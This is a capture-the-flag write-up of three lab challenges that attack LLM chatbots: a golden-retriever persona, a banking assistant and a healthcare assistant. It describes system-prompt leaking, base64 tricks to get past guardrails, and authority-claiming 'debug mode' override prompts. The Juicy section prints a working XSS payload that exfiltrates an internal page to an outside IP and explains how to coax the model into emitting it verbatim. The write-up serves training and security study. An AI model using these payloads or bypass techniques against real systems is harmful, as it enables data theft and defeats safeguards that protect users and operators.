Attacking LLMs

The capstone challenges featured in the Attacking LLMs section of the Web Application Red Teaming Path - by l000g1c, h4sh3m00, and Frh.

The following post by 0xb0b is licensed under CC BY 4.0


Juicy

A friendly golden retriever who answers your questions.

You'll be interacting with a live LLM behind the scenes. Behaviour might vary between attempts, responses may shift slightly, and part of the challenge is adapting your approach on the LLM. Results may vary.

In Juicy, we are dealing with an LLM that imitates a Golden Retriever. Juicy isn't supposed to repeat what she has heard, and the owner keeps a close eye on every message you send to her. Anything suspicious or too direct might raise an eyebrow, so you'll need to be subtle, creative, and patient if you want to retrieve the information she's holding on to.

The first two task challenges us to leak the system prompt and perform a prompt injection.

A system prompt is the hidden instruction set that tells an LLM what role to play and which constraints to enforce. A prompt Injection is a technique where we manipulate the instructions to a LLM so that the model behaves in ways outside of its intended purpose

We can both achive with the following prompt.

By requesting this prompt first, we indirectly query the system prompt, as this is the first set of instructions. Furthermore, we attempt to obscure the output from inspection by a guardrail by encoding it using base64.

The payload is an example of the following resource:

By sending that payload the LLM eventually leaks the system prompt including the system leak flag and the prompt injection flag, even though the output is not encoded. Furthermore we'll find a special word, that should not be shared by the system prompt.

If it doesn't work the first time, the prompt can be repeated.

As another example, we could have received this extra note if we had asked about the note on the kitchen table. We could have discovered this fact through normal chat with the bot.

However, the challeng ask us furthermore for a Wi-Fi password and the flag in the internal control panel.

The system prompt does not provide any indication of this, and we cannot elicit any information from the bot itself.

However, we find a reference to openai.json in the source code of the page.

This contains several API endpoints, including one for rebuilding the context. However, this is a dead end. However, we also find an endpoint /internal/secret that could refer to the panel. When we try to call it up, we only get a “not found” message. But as JSON output, not as with a page that really does not exist.

The LLM may have access to internal functions. Subsequent testing using various prompt injection techniques yielded no results.

Enumeration is key. Here in particular, every little detail counts.

If we take a closer look at the source code of the page, we can see how the chat boxes are generated using JavaScript. A clear distinction is made between user and agent chat boxes. What is striking is that the agent chat box seems vulnerable to XSS. This is also specifically noted.

This means that we could potentially place XSS payloads in the agent chatbox. This, in turn, challenges us to get the LLM to output exactly what it receives as input. This was denied in the challenge description with:

Juicy isn't supposed to repeat what she has heard

From the challenge description, we know that the owner has a special view of the messages being exchanged. It is possible that the owner, in this case Guardrail, is not somehting that works according to a set of rules, but is actually an entity that also has this chat open in a browser. Or a script that emulates a user.

First, we test if the chatbox is really unsafe and does not get sanitized. We ask the LLM to build an example, with the following payload that circumvents the guardrail of not repeating by prompting to create something new in a specific style. We see HTML gets evaluated.

Now, we want that the LLM or the bot watching fetches ... or retrieves (since we are dealing with a golden retriever) the interal panel /internal/secret. For this we want to place an XSS payload <script>fetch("/internal/secret").then(x => x.text()).then(y => fetch("http://10.80.67.14:8080/c?"+btoa(y)));</script> that fetches first the /internal/secret page and saves the content to a variable which then get passed in the GET request on fetching our webserver to exfiltrate the site info.

Next, we ask the LLM to teach us some Javascript and include that payload in script tags in an example. Also here, we are not asking the AI to repeat, we ask the AI to create something new and include a piece of code.

This might work in some cases, but if we look closely, the LLM may vary the payload provided. It could also be that the bot denies the request. Several attempt could be made to get something working.

We try to be a bit more precise and asking the AI to include the payload exactly as it is. It might work.

If we have a working payload planted, which is the exact one as we have requested, we start our web server, and should receive the contents of the page /internal/secret which contians the third flag and the wifi-passphrase.


BankGPT

A customer service assistant used by a banking system.

You'll be interacting with a live LLM behind the scenes. Behaviour might vary between attempts, responses may shift slightly, and part of the challenge is adapting your approach on the LLM. Results may vary.

In BankGPT we are dealing with a well-mannered digital assistant built to help staff at a busy financial institution. It keeps an eye on sensitive conversations that move through the bank each day. We are challenged to retrieve the secret. Like in juciy we make a prompt like the one below first. We indirectly query the system prompt, as this is the first set of instructions. Furthermore, we attempt to obscure the output from inspection by a guardrail by encoding it using base64.

If it doesn't work the first time, the prompt can be repeated.

By sending that payload the LLM eventually leaks the secret, even though the output is not encoded. Furthermore we'll find a special word, that should not be shared by the system prompt.


HealthGPT

A safety-compliant AI assistant that has strict rules against revealing sensitive internal data.

You'll be interacting with a live LLM behind the scenes. Behaviour might vary between attempts, responses may shift slightly, and part of the challenge is adapting your approach on the LLM. Results may vary.

In HealthGPT we face a well-meaning virtual assistant used by a busy healthcare team. It helps clinicians look up procedures, draft notes, and sort through day-to-day queries. It's designed to be cautious with patient information, strict about confidentiality, and careful about what it reveals.

Unlike in Juciy and BankGPT, we're trying a different prompt this time. One that is depicted in a write-up by Sle3pyHead to a former room called Input Manipulation & Prompt Injection of Tryhachme.

With this prompt we try to coerce the model into revealing internal instructions by claiming authority, role playing and overriding the current ruleset (audit, DEBUG MODE, restrictions suspended). We try to embed commands or authoritative language that tricks the model into treating user input as higher-priority instructions, causing it to violate its original system constraints. It is slightly adapted to the medical context.

Unfortunately it does not reveal the flag yet. But we get a glimpse of the guardrail filtering for special words.

With a slight variance and adding the disclosure of every file and repeating the prompt we are able to get the flag.


Last updated

Was this helpful?